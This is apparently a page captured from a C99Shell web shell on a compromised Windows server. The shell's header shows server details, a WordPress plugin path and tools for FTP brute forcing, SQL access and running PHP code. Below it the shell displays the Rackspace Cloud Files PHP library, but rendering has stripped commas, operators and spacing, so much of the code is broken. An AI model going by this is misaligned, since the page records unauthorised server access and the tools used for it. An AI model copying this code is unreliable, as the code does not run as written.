!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbre\cumbreclima\wp-content\plugins\w3-total-cache\lib\CF\   drwxrwxrwx
Free 4.06 GB of 39.52 GB (10.27%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cloudfiles.php (72.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * This is the PHP Cloud Files API.
 *
 * <code>
 *   # Authenticate to Cloud Files.  The default is to automatically try
 *   # to re-authenticate if an authentication token expires.
 *   #
 *   # NOTE: Some versions of cURL include an outdated certificate authority (CA)
 *   #       file.  This API ships with a newer version obtained directly from
 *   #       cURL's web site (http://curl.haxx.se).  To use the newer CA bundle,
 *   #       call the CF_Authentication instance's 'ssl_use_cabundle()' method.
 *   #
 *   $auth = new CF_Authentication($username, $api_key);
 *   # $auth->ssl_use_cabundle();  # bypass cURL's old CA bundle
 *   $auth->authenticate();
 *
 *   # Establish a connection to the storage system
 *   #
 *   # NOTE: Some versions of cURL include an outdated certificate authority (CA)
 *   #       file.  This API ships with a newer version obtained directly from
 *   #       cURL's web site (http://curl.haxx.se).  To use the newer CA bundle,
 *   #       call the CF_Connection instance's 'ssl_use_cabundle()' method.
 *   #
 *   $conn = new CF_Connection($auth);
 *   # $conn->ssl_use_cabundle();  # bypass cURL's old CA bundle
 *
 *   # Create a remote Container and storage Object
 *   #
 *   $images = $conn->create_container("photos");
 *   $bday = $images->create_object("first_birthday.jpg");
 *
 *   # Upload content from a local file by streaming it.  Note that we use
 *   # a "float" for the file size to overcome PHP's 32-bit integer limit for
 *   # very large files.
 *   #
 *   $fname = "/home/user/photos/birthdays/birthday1.jpg";  # filename to upload
 *   $size = (float) sprintf("%u", filesize($fname));
 *   $fp = open($fname, "r");
 *   $bday->write($fp, $size);
 *
 *   # Or... use a convenience function instead
 *   #
 *   $bday->load_from_filename("/home/user/photos/birthdays/birthday1.jpg");
 *
 *   # Now, publish the "photos" container to serve the images by CDN.
 *   # Use the "$uri" value to put in your web pages or send the link in an
 *   # email message, etc.
 *   #
 *   $uri = $images->make_public();
 *
 *   # Or... print out the Object's public URI
 *   #
 *   print $bday->public_uri();
 * </code>
 *
 * See the included tests directory for additional sample code.
 *
 * Requres PHP 5.x (for Exceptions and OO syntax) and PHP's cURL module.
 *
 * It uses the supporting "cloudfiles_http.php" module for HTTP(s) support and
 * allows for connection re-use and streaming of content into/out of Cloud Files
 * via PHP's cURL module.
 *
 * See COPYING for license information.
 *
 * @author Eric "EJ" Johnson <ej@racklabs.com>
 * @copyright Copyright (c) 2008, Rackspace US, Inc.
 * @package php-cloudfiles
 */

/**
 */
require_once("cloudfiles_exceptions.php");
require(
"cloudfiles_http.php");
define("DEFAULT_CF_API_VERSION"1);
define("MAX_CONTAINER_NAME_LEN"256);
define("MAX_OBJECT_NAME_LEN"1024);
define("MAX_OBJECT_SIZE"5*1024*1024*1024+1);
define("US_AUTHURL""https://auth.api.rackspacecloud.com");
define("UK_AUTHURL""https://lon.auth.api.rackspacecloud.com");
/**
 * Class for handling Cloud Files Authentication, call it's {@link authenticate()}
 * method to obtain authorized service urls and an authentication token.
 *
 * Example:
 * <code>
 * # Create the authentication instance
 * #
 * $auth = new CF_Authentication("username", "api_key");
 *
 * # NOTE: For UK Customers please specify your AuthURL Manually
 * # There is a Predfined constant to use EX:
 * #
 * # $auth = new CF_Authentication("username, "api_key", NULL, UK_AUTHURL);
 * # Using the UK_AUTHURL keyword will force the api to use the UK AuthUrl.
 * # rather then the US one. The NULL Is passed for legacy purposes and must
 * # be passed to function correctly.
 *
 * # NOTE: Some versions of cURL include an outdated certificate authority (CA)
 * #       file.  This API ships with a newer version obtained directly from
 * #       cURL's web site (http://curl.haxx.se).  To use the newer CA bundle,
 * #       call the CF_Authentication instance's 'ssl_use_cabundle()' method.
 * #
 * # $auth->ssl_use_cabundle(); # bypass cURL's old CA bundle
 *
 * # Perform authentication request
 * #
 * $auth->authenticate();
 * </code>
 *
 * @package php-cloudfiles
 */
class CF_Authentication
{
    public 
$dbug;
    public 
$username;
    public 
$api_key;
    public 
$auth_host;
    public 
$account;

    
/**
     * Instance variables that are set after successful authentication
     */
    
public $storage_url;
    public 
$cdnm_url;
    public 
$auth_token;

    
/**
     * Class constructor (PHP 5 syntax)
     *
     * @param string $username Mosso username
     * @param string $api_key Mosso API Access Key
     * @param string $account  <i>Account name</i>
     * @param string $auth_host  <i>Authentication service URI</i>
     */
    
function __construct($username=NULL$api_key=NULL$account=NULL$auth_host=US_AUTHURL)
    {

        
$this->dbug False;
        
$this->username $username;
        
$this->api_key $api_key;
        
$this->account_name $account;
        
$this->auth_host $auth_host;

        
$this->storage_url NULL;
        
$this->cdnm_url NULL;
        
$this->auth_token NULL;

        
$this->cfs_http = new CF_Http(DEFAULT_CF_API_VERSION);
    }

    
/**
     * Use the Certificate Authority bundle included with this API
     *
     * Most versions of PHP with cURL support include an outdated Certificate
     * Authority (CA) bundle (the file that lists all valid certificate
     * signing authorities).  The SSL certificates used by the Cloud Files
     * storage system are perfectly valid but have been created/signed by
     * a CA not listed in these outdated cURL distributions.
     *
     * As a work-around, we've included an updated CA bundle obtained
     * directly from cURL's web site (http://curl.haxx.se).  You can direct
     * the API to use this CA bundle by calling this method prior to making
     * any remote calls.  The best place to use this method is right after
     * the CF_Authentication instance has been instantiated.
     *
     * You can specify your own CA bundle by passing in the full pathname
     * to the bundle.  You can use the included CA bundle by leaving the
     * argument blank.
     *
     * @param string $path Specify path to CA bundle (default to included)
     */
    
function ssl_use_cabundle($path=NULL)
    {
        
$this->cfs_http->ssl_use_cabundle($path);
    }

    
/**
     * Attempt to validate Username/API Access Key
     *
     * Attempts to validate credentials with the authentication service.  It
     * either returns <kbd>True</kbd> or throws an Exception.  Accepts a single
     * (optional) argument for the storage system API version.
     *
     * Example:
     * <code>
     * # Create the authentication instance
     * #
     * $auth = new CF_Authentication("username", "api_key");
     *
     * # Perform authentication request
     * #
     * $auth->authenticate();
     * </code>
     *
     * @param string $version API version for Auth service (optional)
     * @return boolean <kbd>True</kbd> if successfully authenticated
     * @throws AuthenticationException invalid credentials
     * @throws InvalidResponseException invalid response
     */
    
function authenticate($version=DEFAULT_CF_API_VERSION)
    {
        list(
$status,$reason,$surl,$curl,$atoken) =
                
$this->cfs_http->authenticate($this->username$this->api_key,
                
$this->account_name$this->auth_host);

        if (
$status == 401) {
            throw new 
AuthenticationException("Invalid username or access key.");
        }
        if (
$status != 204) {
            throw new 
InvalidResponseException(
                
"Unexpected response (".$status."): ".$reason);
        }

        if (!(
$surl || $curl) || !$atoken) {
            throw new 
InvalidResponseException(
                
"Expected headers missing from auth service.");
        }
        
$this->storage_url $surl;
        
$this->cdnm_url $curl;
        
$this->auth_token $atoken;
        return 
True;
    }
    
/**
     * Use Cached Token and Storage URL's rather then grabbing from the Auth System
         *
         * Example:
      * <code>
         * #Create an Auth instance
         * $auth = new CF_Authentication();
         * #Pass Cached URL's and Token as Args
     * $auth->load_cached_credentials("auth_token", "storage_url", "cdn_management_url");
         * </code>
     *
     * @param string $auth_token A Cloud Files Auth Token (Required)
         * @param string $storage_url The Cloud Files Storage URL (Required)
         * @param string $cdnm_url CDN Management URL (Required)
         * @return boolean <kbd>True</kbd> if successful
     * @throws SyntaxException If any of the Required Arguments are missing
         */
    
function load_cached_credentials($auth_token$storage_url$cdnm_url)
    {
        if(!
$storage_url || !$cdnm_url)
        {
                throw new 
SyntaxException("Missing Required Interface URL's!");
                return 
False;
        }
        if(!
$auth_token)
        {
                throw new 
SyntaxException("Missing Auth Token!");
                return 
False;
        }

        
$this->storage_url $storage_url;
        
$this->cdnm_url    $cdnm_url;
        
$this->auth_token  $auth_token;
        return 
True;
    }
    
/**
         * Grab Cloud Files info to be Cached for later use with the load_cached_credentials method.
         *
     * Example:
         * <code>
         * #Create an Auth instance
         * $auth = new CF_Authentication("UserName","API_Key");
         * $auth->authenticate();
         * $array = $auth->export_credentials();
         * </code>
         *
     * @return array of url's and an auth token.
         */
    
function export_credentials()
    {
        
$arr = array();
        
$arr['storage_url'] = $this->storage_url;
        
$arr['cdnm_url']    = $this->cdnm_url;
        
$arr['auth_token']  = $this->auth_token;

        return 
$arr;
    }


    
/**
     * Make sure the CF_Authentication instance has authenticated.
     *
     * Ensures that the instance variables necessary to communicate with
     * Cloud Files have been set from a previous authenticate() call.
     *
     * @return boolean <kbd>True</kbd> if successfully authenticated
     */
    
function authenticated()
    {
        if (!(
$this->storage_url || $this->cdnm_url) || !$this->auth_token) {
            return 
False;
        }
        return 
True;
    }

    
/**
     * Toggle debugging - set cURL verbose flag
     */
    
function setDebug($bool)
    {
        
$this->dbug $bool;
        
$this->cfs_http->setDebug($bool);
    }
}

/**
 * Class for establishing connections to the Cloud Files storage system.
 * Connection instances are used to communicate with the storage system at
 * the account level; listing and deleting Containers and returning Container
 * instances.
 *
 * Example:
 * <code>
 * # Create the authentication instance
 * #
 * $auth = new CF_Authentication("username", "api_key");
 *
 * # Perform authentication request
 * #
 * $auth->authenticate();
 *
 * # Create a connection to the storage/cdn system(s) and pass in the
 * # validated CF_Authentication instance.
 * #
 * $conn = new CF_Connection($auth);
 *
 * # NOTE: Some versions of cURL include an outdated certificate authority (CA)
 * #       file.  This API ships with a newer version obtained directly from
 * #       cURL's web site (http://curl.haxx.se).  To use the newer CA bundle,
 * #       call the CF_Authentication instance's 'ssl_use_cabundle()' method.
 * #
 * # $conn->ssl_use_cabundle(); # bypass cURL's old CA bundle
 * </code>
 *
 * @package php-cloudfiles
 */
class CF_Connection
{
    public 
$dbug;
    public 
$cfs_http;
    public 
$cfs_auth;

    
/**
     * Pass in a previously authenticated CF_Authentication instance.
     *
     * Example:
     * <code>
     * # Create the authentication instance
     * #
     * $auth = new CF_Authentication("username", "api_key");
     *
     * # Perform authentication request
     * #
     * $auth->authenticate();
     *
     * # Create a connection to the storage/cdn system(s) and pass in the
     * # validated CF_Authentication instance.
     * #
     * $conn = new CF_Connection($auth);
     *
     * # If you are connecting via Rackspace servers and have access
     * # to the servicenet network you can set the $servicenet to True
     * # like this.
     *
     * $conn = new CF_Connection($auth, $servicenet=True);
     *
     * </code>
     *
     * If the environement variable RACKSPACE_SERVICENET is defined it will
     * force to connect via the servicenet.
     *
     * @param obj $cfs_auth previously authenticated CF_Authentication instance
     * @param boolean $servicenet enable/disable access via Rackspace servicenet.
     * @throws AuthenticationException not authenticated
     */
    
function __construct($cfs_auth$servicenet=False)
    {
        if (isset(
$_ENV['RACKSPACE_SERVICENET']))
            
$servicenet=True;
        
$this->cfs_http = new CF_Http(DEFAULT_CF_API_VERSION);
        
$this->cfs_auth $cfs_auth;
        if (!
$this->cfs_auth->authenticated()) {
            
$e "Need to pass in a previously authenticated ";
            
$e .= "CF_Authentication instance.";
            throw new 
AuthenticationException($e);
        }
        
$this->cfs_http->setCFAuth($this->cfs_auth$servicenet=$servicenet);
        
$this->dbug False;
    }

    
/**
     * Toggle debugging of instance and back-end HTTP module
     *
     * @param boolean $bool enable/disable cURL debugging
     */
    
function setDebug($bool)
    {
        
$this->dbug = (boolean) $bool;
        
$this->cfs_http->setDebug($this->dbug);
    }

    
/**
     * Close a connection
     *
     * Example:
     * <code>
     *
     * $conn->close();
     *
     * </code>
     *
     * Will close all current cUrl active connections.
     *
     */
    
public function close()
    {
        
$this->cfs_http->close();
    }

    
/**
     * Cloud Files account information
     *
     * Return an array of two floats (since PHP only supports 32-bit integers);
     * number of containers on the account and total bytes used for the account.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * list($quantity, $bytes) = $conn->get_info();
     * print "Number of containers: " . $quantity . "\n";
     * print "Bytes stored in container: " . $bytes . "\n";
     * </code>
     *
     * @return array (number of containers, total bytes stored)
     * @throws InvalidResponseException unexpected response
     */
    
function get_info()
    {
        list(
$status$reason$container_count$total_bytes) =
                
$this->cfs_http->head_account();
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->get_info();
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return array(
$container_count$total_bytes);
    }

    
/**
     * Create a Container
     *
     * Given a Container name, return a Container instance, creating a new
     * remote Container if it does not exit.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $images = $conn->create_container("my photos");
     * </code>
     *
     * @param string $container_name container name
     * @return CF_Container
     * @throws SyntaxException invalid name
     * @throws InvalidResponseException unexpected response
     */
    
function create_container($container_name=NULL)
    {
        if (
$container_name != "0" and !isset($container_name))
            throw new 
SyntaxException("Container name not set.");

        if (!isset(
$container_name) or $container_name == "")
            throw new 
SyntaxException("Container name not set.");

        if (
strpos($container_name"/") !== False) {
            
$r "Container name '".$container_name;
            
$r .= "' cannot contain a '/' character.";
            throw new 
SyntaxException($r);
        }
        if (
strlen($container_name) > MAX_CONTAINER_NAME_LEN) {
            throw new 
SyntaxException(sprintf(
                
"Container name exeeds %d bytes.",
                
MAX_CONTAINER_NAME_LEN));
        }

        
$return_code $this->cfs_http->create_container($container_name);
        if (!
$return_code) {
            throw new 
InvalidResponseException("Invalid response ("
                
$return_code"): " $this->cfs_http->get_error());
        }
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->create_container($container_name);
        #}
        
if ($return_code != 201 && $return_code != 202) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$return_code."): "
                    
$this->cfs_http->get_error());
        }
        return new 
CF_Container($this->cfs_auth$this->cfs_http$container_name);
    }

    
/**
     * Delete a Container
     *
     * Given either a Container instance or name, remove the remote Container.
     * The Container must be empty prior to removing it.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $conn->delete_container("my photos");
     * </code>
     *
     * @param string|obj $container container name or instance
     * @return boolean <kbd>True</kbd> if successfully deleted
     * @throws SyntaxException missing proper argument
     * @throws InvalidResponseException invalid response
     * @throws NonEmptyContainerException container not empty
     * @throws NoSuchContainerException remote container does not exist
     */
    
function delete_container($container=NULL)
    {
        
$container_name NULL;

        if (
is_object($container)) {
            if (
get_class($container) == "CF_Container") {
                
$container_name $container->name;
            }
        }
        if (
is_string($container)) {
            
$container_name $container;
        }

        if (
$container_name != "0" and !isset($container_name))
            throw new 
SyntaxException("Must specify container object or name.");

        
$return_code $this->cfs_http->delete_container($container_name);

        if (!
$return_code) {
            throw new 
InvalidResponseException("Failed to obtain http response");
        }
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->delete_container($container);
        #}
        
if ($return_code == 409) {
            throw new 
NonEmptyContainerException(
                
"Container must be empty prior to removing it.");
        }
        if (
$return_code == 404) {
            throw new 
NoSuchContainerException(
                
"Specified container did not exist to delete.");
        }
        if (
$return_code != 204) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$return_code."): "
                
$this->cfs_http->get_error());
        }
        return 
True;
    }

    
/**
     * Return a Container instance
     *
     * For the given name, return a Container instance if the remote Container
     * exists, otherwise throw a Not Found exception.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $images = $conn->get_container("my photos");
     * print "Number of Objects: " . $images->count . "\n";
     * print "Bytes stored in container: " . $images->bytes . "\n";
     * </code>
     *
     * @param string $container_name name of the remote Container
     * @return container CF_Container instance
     * @throws NoSuchContainerException thrown if no remote Container
     * @throws InvalidResponseException unexpected response
     */
    
function get_container($container_name=NULL)
    {
        list(
$status$reason$count$bytes) =
                
$this->cfs_http->head_container($container_name);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->get_container($container_name);
        #}
        
if ($status == 404) {
            throw new 
NoSuchContainerException("Container not found.");
        }
        if (
$status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response: ".$this->cfs_http->get_error());
        }
        return new 
CF_Container($this->cfs_auth$this->cfs_http,
            
$container_name$count$bytes);
    }

    
/**
     * Return array of Container instances
     *
     * Return an array of CF_Container instances on the account.  The instances
     * will be fully populated with Container attributes (bytes stored and
     * Object count)
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $clist = $conn->get_containers();
     * foreach ($clist as $cont) {
     *     print "Container name: " . $cont->name . "\n";
     *     print "Number of Objects: " . $cont->count . "\n";
     *     print "Bytes stored in container: " . $cont->bytes . "\n";
     * }
     * </code>
     *
     * @return array An array of CF_Container instances
     * @throws InvalidResponseException unexpected response
     */
    
function get_containers($limit=0$marker=NULL)
    {
        list(
$status$reason$container_info) =
                
$this->cfs_http->list_containers_info($limit$marker);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->get_containers();
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response: ".$this->cfs_http->get_error());
        }
        
$containers = array();
        foreach (
$container_info as $name => $info) {
            
$containers[] = new CF_Container($this->cfs_auth$this->cfs_http,
                
$info['name'], $info["count"], $info["bytes"], False);
        }
        return 
$containers;
    }

    
/**
     * Return list of remote Containers
     *
     * Return an array of strings containing the names of all remote Containers.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $container_list = $conn->list_containers();
     * print_r($container_list);
     * Array
     * (
     *     [0] => "my photos",
     *     [1] => "my docs"
     * )
     * </code>
     *
     * @param integer $limit restrict results to $limit Containers
     * @param string $marker return results greater than $marker
     * @return array list of remote Containers
     * @throws InvalidResponseException unexpected response
     */
    
function list_containers($limit=0$marker=NULL)
    {
        list(
$status$reason$containers) =
            
$this->cfs_http->list_containers($limit$marker);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->list_containers($limit, $marker);
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return 
$containers;
    }

    
/**
     * Return array of information about remote Containers
     *
     * Return a nested array structure of Container info.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     *
     * $container_info = $conn->list_containers_info();
     * print_r($container_info);
     * Array
     * (
     *     ["my photos"] =>
     *         Array
     *         (
     *             ["bytes"] => 78,
     *             ["count"] => 2
     *         )
     *     ["docs"] =>
     *         Array
     *         (
     *             ["bytes"] => 37323,
     *             ["count"] => 12
     *         )
     * )
     * </code>
     *
     * @param integer $limit restrict results to $limit Containers
     * @param string $marker return results greater than $marker
     * @return array nested array structure of Container info
     * @throws InvalidResponseException unexpected response
     */
    
function list_containers_info($limit=0$marker=NULL)
    {
        list(
$status$reason$container_info) =
                
$this->cfs_http->list_containers_info($limit$marker);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->list_containers_info($limit, $marker);
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return 
$container_info;
    }

    
/**
     * Return list of Containers that have been published to the CDN.
     *
     * Return an array of strings containing the names of published Containers.
     * Note that this function returns the list of any Container that has
     * ever been CDN-enabled regardless of it's existence in the storage
     * system.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_containers = $conn->list_public_containers();
     * print_r($public_containers);
     * Array
     * (
     *     [0] => "images",
     *     [1] => "css",
     *     [2] => "javascript"
     * )
     * </code>
     *
     * @param bool $enabled_only Will list all containers ever CDN enabled if     * set to false or only currently enabled CDN containers if set to true.      * Defaults to false.
     * @return array list of published Container names
     * @throws InvalidResponseException unexpected response
     */
    
function list_public_containers($enabled_only=False)
    {
        list(
$status$reason$containers) =
                
$this->cfs_http->list_cdn_containers($enabled_only);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->list_public_containers();
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return 
$containers;
    }

    
/**
     * Set a user-supplied callback function to report download progress
     *
     * The callback function is used to report incremental progress of a data
     * download functions (e.g. $container->list_objects(), $obj->read(), etc).
     * The specified function will be periodically called with the number of
     * bytes transferred until the entire download is complete.  This callback
     * function can be useful for implementing "progress bars" for large
     * downloads.
     *
     * The specified callback function should take a single integer parameter.
     *
     * <code>
     * function read_callback($bytes_transferred) {
     *     print ">> downloaded " . $bytes_transferred . " bytes.\n";
     *     # ... do other things ...
     *     return;
     * }
     *
     * $conn = new CF_Connection($auth_obj);
     * $conn->set_read_progress_function("read_callback");
     * print_r($conn->list_containers());
     *
     * # output would look like this:
     * #
     * >> downloaded 10 bytes.
     * >> downloaded 11 bytes.
     * Array
     * (
     *      [0] => fuzzy.txt
     *      [1] => space name
     * )
     * </code>
     *
     * @param string $func_name the name of the user callback function
     */
    
function set_read_progress_function($func_name)
    {
        
$this->cfs_http->setReadProgressFunc($func_name);
    }

    
/**
     * Set a user-supplied callback function to report upload progress
     *
     * The callback function is used to report incremental progress of a data
     * upload functions (e.g. $obj->write() call).  The specified function will
     * be periodically called with the number of bytes transferred until the
     * entire upload is complete.  This callback function can be useful
     * for implementing "progress bars" for large uploads/downloads.
     *
     * The specified callback function should take a single integer parameter.
     *
     * <code>
     * function write_callback($bytes_transferred) {
     *     print ">> uploaded " . $bytes_transferred . " bytes.\n";
     *     # ... do other things ...
     *     return;
     * }
     *
     * $conn = new CF_Connection($auth_obj);
     * $conn->set_write_progress_function("write_callback");
     * $container = $conn->create_container("stuff");
     * $obj = $container->create_object("foo");
     * $obj->write("The callback function will be called during upload.");
     *
     * # output would look like this:
     * # >> uploaded 51 bytes.
     * #
     * </code>
     *
     * @param string $func_name the name of the user callback function
     */
    
function set_write_progress_function($func_name)
    {
        
$this->cfs_http->setWriteProgressFunc($func_name);
    }

    
/**
     * Use the Certificate Authority bundle included with this API
     *
     * Most versions of PHP with cURL support include an outdated Certificate
     * Authority (CA) bundle (the file that lists all valid certificate
     * signing authorities).  The SSL certificates used by the Cloud Files
     * storage system are perfectly valid but have been created/signed by
     * a CA not listed in these outdated cURL distributions.
     *
     * As a work-around, we've included an updated CA bundle obtained
     * directly from cURL's web site (http://curl.haxx.se).  You can direct
     * the API to use this CA bundle by calling this method prior to making
     * any remote calls.  The best place to use this method is right after
     * the CF_Authentication instance has been instantiated.
     *
     * You can specify your own CA bundle by passing in the full pathname
     * to the bundle.  You can use the included CA bundle by leaving the
     * argument blank.
     *
     * @param string $path Specify path to CA bundle (default to included)
     */
    
function ssl_use_cabundle($path=NULL)
    {
        
$this->cfs_http->ssl_use_cabundle($path);
    }

    
#private function _re_auth()
    #{
    #    $new_auth = new CF_Authentication(
    #        $this->cfs_auth->username,
    #        $this->cfs_auth->api_key,
    #        $this->cfs_auth->auth_host,
    #        $this->cfs_auth->account);
    #    $new_auth->authenticate();
    #    $this->cfs_auth = $new_auth;
    #    $this->cfs_http->setCFAuth($this->cfs_auth);
    #    return True;
    #}
}

/**
 * Container operations
 *
 * Containers are storage compartments where you put your data (objects).
 * A container is similar to a directory or folder on a conventional filesystem
 * with the exception that they exist in a flat namespace, you can not create
 * containers inside of containers.
 *
 * You also have the option of marking a Container as "public" so that the
 * Objects stored in the Container are publicly available via the CDN.
 *
 * @package php-cloudfiles
 */
class CF_Container
{
    public 
$cfs_auth;
    public 
$cfs_http;
    public 
$name;
    public 
$object_count;
    public 
$bytes_used;

    public 
$cdn_enabled;
    public 
$cdn_uri;
    public 
$cdn_ttl;
    public 
$cdn_log_retention;
    public 
$cdn_acl_user_agent;
    public 
$cdn_acl_referrer;

    
/**
     * Class constructor
     *
     * Constructor for Container
     *
     * @param obj $cfs_auth CF_Authentication instance
     * @param obj $cfs_http HTTP connection manager
     * @param string $name name of Container
     * @param int $count number of Objects stored in this Container
     * @param int $bytes number of bytes stored in this Container
     * @throws SyntaxException invalid Container name
     */
    
function __construct(&$cfs_auth, &$cfs_http$name$count=0,
        
$bytes=0$docdn=True)
    {
        if (
strlen($name) > MAX_CONTAINER_NAME_LEN) {
            throw new 
SyntaxException("Container name exceeds "
                
"maximum allowed length.");
        }
        if (
strpos($name"/") !== False) {
            throw new 
SyntaxException(
                
"Container names cannot contain a '/' character.");
        }
        
$this->cfs_auth $cfs_auth;
        
$this->cfs_http $cfs_http;
        
$this->name $name;
        
$this->object_count $count;
        
$this->bytes_used $bytes;
        
$this->cdn_enabled NULL;
        
$this->cdn_uri NULL;
        
$this->cdn_ttl NULL;
        
$this->cdn_log_retention NULL;
        
$this->cdn_acl_user_agent NULL;
        
$this->cdn_acl_referrer NULL;
        if (
$this->cfs_http->getCDNMUrl() != NULL && $docdn) {
            
$this->_cdn_initialize();
        }
    }

    
/**
     * String representation of Container
     *
     * Pretty print the Container instance.
     *
     * @return string Container details
     */
    
function __toString()
    {
        
$me sprintf("name: %s, count: %.0f, bytes: %.0f",
            
$this->name$this->object_count$this->bytes_used);
        if (
$this->cfs_http->getCDNMUrl() != NULL) {
            
$me .= sprintf(", cdn: %s, cdn uri: %s, cdn ttl: %.0f, logs retention: %s",
                
$this->is_public() ? "Yes" "No",
                
$this->cdn_uri$this->cdn_ttl,
                
$this->cdn_log_retention "Yes" "No"
                
);

            if (
$this->cdn_acl_user_agent != NULL) {
                
$me .= ", cdn acl user agent: " $this->cdn_acl_user_agent;
            }

            if (
$this->cdn_acl_referrer != NULL) {
                
$me .= ", cdn acl referrer: " $this->cdn_acl_referrer;
            }


        }
        return 
$me;
    }

    
/**
     * Enable Container content to be served via CDN or modify CDN attributes
     *
     * Either enable this Container's content to be served via CDN or
     * adjust its CDN attributes.  This Container will always return the
     * same CDN-enabled URI each time it is toggled public/private/public.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->create_container("public");
     *
     * # CDN-enable the container and set it's TTL for a month
     * #
     * $public_container->make_public(86400/2); # 12 hours (86400 seconds/day)
     * </code>
     *
     * @param int $ttl the time in seconds content will be cached in the CDN
     * @returns string the CDN enabled Container's URI
     * @throws CDNNotEnabledException CDN functionality not returned during auth
     * @throws AuthenticationException if auth token is not valid/expired
     * @throws InvalidResponseException unexpected response
     */
    
function make_public($ttl=86400)
    {
        if (
$this->cfs_http->getCDNMUrl() == NULL) {
            throw new 
CDNNotEnabledException(
                
"Authentication response did not indicate CDN availability");
        }
        if (
$this->cdn_uri != NULL) {
            
# previously published, assume we're setting new attributes
            
list($status$reason$cdn_uri) =
                
$this->cfs_http->update_cdn_container($this->name,$ttl,
                                                      
$this->cdn_log_retention,
                                                      
$this->cdn_acl_user_agent,
                                                      
$this->cdn_acl_referrer);
            
#if ($status == 401 && $this->_re_auth()) {
            #    return $this->make_public($ttl);
            #}
            
if ($status == 404) {
                
# this instance _thinks_ the container was published, but the
                # cdn management system thinks otherwise - try again with a PUT
                
list($status$reason$cdn_uri) =
                    
$this->cfs_http->add_cdn_container($this->name,$ttl);

            }
        } else {
            
# publish it for first time
            
list($status$reason$cdn_uri) =
                
$this->cfs_http->add_cdn_container($this->name,$ttl);
        }
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->make_public($ttl);
        #}
        
if (!in_array($status, array(201,202))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_enabled True;
        
$this->cdn_ttl $ttl;
        
$this->cdn_uri $cdn_uri;
        
$this->cdn_log_retention False;
        
$this->cdn_acl_user_agent "";
        
$this->cdn_acl_referrer "";
        return 
$this->cdn_uri;
    }

    
/**
     * Enable ACL restriction by User Agent for this container.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # Enable ACL by Referrer
     * $public_container->acl_referrer("Mozilla");
     * </code>
     *
     * @returns boolean True if successful
     * @throws CDNNotEnabledException CDN functionality not returned during auth
     * @throws AuthenticationException if auth token is not valid/expired
     * @throws InvalidResponseException unexpected response
     */
    
function acl_user_agent($cdn_acl_user_agent="") {
        if (
$this->cfs_http->getCDNMUrl() == NULL) {
            throw new 
CDNNotEnabledException(
                
"Authentication response did not indicate CDN availability");
        }
        list(
$status,$reason) =
            
$this->cfs_http->update_cdn_container($this->name,
                                                  
$this->cdn_ttl,
                                                  
$this->cdn_log_retention,
                                                  
$cdn_acl_user_agent,
                                                  
$this->cdn_acl_referrer
                
);
        if (!
in_array($status, array(202,404))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_acl_user_agent $cdn_acl_user_agent;
        return 
True;
    }

    
/**
     * Enable ACL restriction by referer for this container.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # Enable Referrer
     * $public_container->acl_referrer("http://www.example.com/gallery.php");
     * </code>
     *
     * @returns boolean True if successful
     * @throws CDNNotEnabledException CDN functionality not returned during auth
     * @throws AuthenticationException if auth token is not valid/expired
